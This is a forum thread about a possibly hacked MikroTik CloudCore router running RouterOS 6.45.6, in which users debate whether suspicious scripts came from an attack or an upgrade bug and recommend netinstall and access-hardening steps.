Just to share that yesterday we discovered one of the public facing mikrotik being hacked. we do not think password leaked and it should be via some vulnerability hack. Below is the details :
Model : Routerboard 3011UiAS (CloudCore)
OS version : 6.45.6
IP Services : Only Winbox is allowed from internal network range
What the hack did :
When was the last time you did change the password? Is it possibe that it has not been changed since your router was running RouterOS v6.42 or an older version?
Like Strods wrote! This is an old script that is from old version of ROS. Also Do you use a master password for Winbox? If not then you should know that if you export addresses.wbx this is an unencrypted file that can be opened with notepad and to read all IP/username/passwords saved there!
What do you mean “the same experience”?? That is not the same, it is something completely different!
It is the result of a bug in RouterOS which is triggered by rename of the wireless interface.
I guess you all had router opened for remote access using winbox, ssh, telnet or web access.
Winbox was hacked some time back and are fixed in later version. (lots of scan was done to the winbox port 8291, so 2. in list below would have helped)
VPN is the best option for remote access to the router.
If VPN can not be used, then follow this:
Use another port than default.
Use port knocking. This prevents someone from seeing open ports.
Use a long and good password.
Use access list to prevent any random internet from accessing your router.
sorry my bad word. le me correct. “similiar case” i juts want to share what happen on my router last day. and found this thread by searching “7wmp0b4s.rsc”
before attack happen i already set only enable winbox service with random port & local ip, filter rule drop port scanner.
Now you have edited the post and added that part (where from?) with tool fetch.
I think originally there was only the screenshot with the environment variables and THAT is not a sign the router was hacked, it is the result of a RouterOS bug.
When you have some things a developer did not expect you to do (e.g. renamed wlan1 to something else, or removed wireless package) a conversion script run after upgrade failed halfway, and left all that crap in the environment.
Ok that is the full info you should have given in your first post.
I presume it is still present in your router?
You need to netinstall it with format, and NOT restore a backup.
So best is to do a clean configuration.
At most you can do a /export before you wipe it and keep it as a guide to remember what you need to configure.
To the OP, you need to download a recent stable version of the software (long term versions are usually good), and then use the netinstall process to get the router back to a clean mode.
Do not open the router to the internet on the input chain and do not use any old passwords for the admin.
Also limit admin access to the router itself (input chain) to specific LANIPs (namely devices of the admin).
